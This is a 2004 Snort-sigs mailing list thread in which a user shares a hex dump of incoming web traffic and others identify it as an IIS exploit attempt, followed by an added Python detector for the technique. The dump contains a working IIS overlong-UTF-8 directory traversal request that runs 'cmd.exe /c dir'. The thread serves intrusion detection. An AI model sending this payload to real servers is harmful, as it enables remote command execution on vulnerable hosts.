[Snort-sigs] Weird new CMD.EXE payload...

Larry Pingree lpingree at ...146...
Wed Jun 16 08:08:08 EDT 2004


How can I unsubscribe from this list?


LP
 
Best Regards,
 
Larry
 
Larry Pingree
Partner Engineering
Juniper Networks, Inc.
408-543-2190
 
"Visionary people, are visionary, partly because of the great many
things they never get to see." - Larry Pingree

-----Original Message-----
From: snort-sigs-admin at lists.sourceforge.net
[mailto:snort-sigs-admin at lists.sourceforge.net] On Behalf Of Roach4
Sent: Wednesday, June 16, 2004 7:54 AM
To: K. Jared Kalisz
Cc: snort-sigs at lists.sourceforge.net
Subject: Re: [Snort-sigs] Weird new CMD.EXE payload...

Hi Jared,

This simply looks like an IIS exploit... either it's a scan or a specific
vulnerable string against your web server.

Good luck,

David



>
> I'm seeing a lot of this this morning. Weird patterns too.. One attempt from
> each source address. They keep pouring in ...
>
> Any thoughts??
>
> 000 : 67 65 74 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   get /scripts/..%
> 010 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 020 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 030 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 040 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69   c0%af..%c0%af/wi
> 050 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
> 060 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 0D 0A      .exe?/c%20dir..
>
>
> Jared Kalisz
> Prodika
> 1245 South Main Street, 2nd Floor
> Grapevine, Texas
> Tel 817.488.3080
> Fax 817.488.7060
>
>
>
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by The 2004 JavaOne(SM) Conference
> Learn from the experts at JavaOne(SM), Sun's Worldwide Java Developer
> Conference, June 28 - July 1 at the Moscone Center in San Francisco, CA
> REGISTER AND SAVE! http://java.sun.com/javaone/sf Priority Code NWMGYKND
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
>



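The request in the quoted hex dump, run through a small detector (an added example, not part of the original thread): `%c0%af` percent-decodes to the bytes C0 AF, an overlong two-byte UTF-8 encoding of `/`, so a check on the raw URL sees no `../` while a lenient decoder does. The function and field names are assumptions of this example; the request bytes are the ones from the dump.

```python
import re
from urllib.parse import unquote_to_bytes

# Request bytes copied from the hex dump in the quoted message (offsets 000-06E).
DUMP_HEX = """
67 65 74 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25
63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69
6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64
2E 65 78 65 3F 2F 63 25 32 30 64 69 72 0D 0A
"""

# C0/C1 lead bytes can only encode code points below 0x80, so any such
# two-byte sequence is an overlong (non-shortest-form) UTF-8 encoding.
OVERLONG_2BYTE = re.compile(rb"[\xC0\xC1][\x80-\xBF]")

def fold_overlong(m):
    """Return the ASCII byte a lenient decoder would produce for the match."""
    lead, cont = m.group(0)
    return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])

def analyse(request: bytes) -> dict:
    method, _, target = request.strip().partition(b" ")
    path, _, query = target.partition(b"?")
    decoded = unquote_to_bytes(path)            # %c0%af -> bytes C0 AF
    overlong = OVERLONG_2BYTE.findall(decoded)
    try:
        decoded.decode("utf-8")                 # strict decoders refuse C0 AF
        strict_ok = True
    except UnicodeDecodeError:
        strict_ok = False
    folded = OVERLONG_2BYTE.sub(fold_overlong, decoded).decode("latin-1")
    depth, escaped = 0, False
    for seg in folded.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
        elif seg not in ("", "."):
            depth += 1
        escaped = escaped or depth < 0          # climbed above the web root
    return {"method": method.decode(), "overlong": len(overlong),
            "strict_utf8_ok": strict_ok, "folded_path": folded,
            "escapes_root": escaped, "query": unquote_to_bytes(query).decode()}

if __name__ == "__main__":
    print(analyse(bytes.fromhex(DUMP_HEX)))
```

Rejecting any request whose path fails strict UTF-8 decoding (`strict_utf8_ok` false) catches this payload before path normalisation is attempted.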



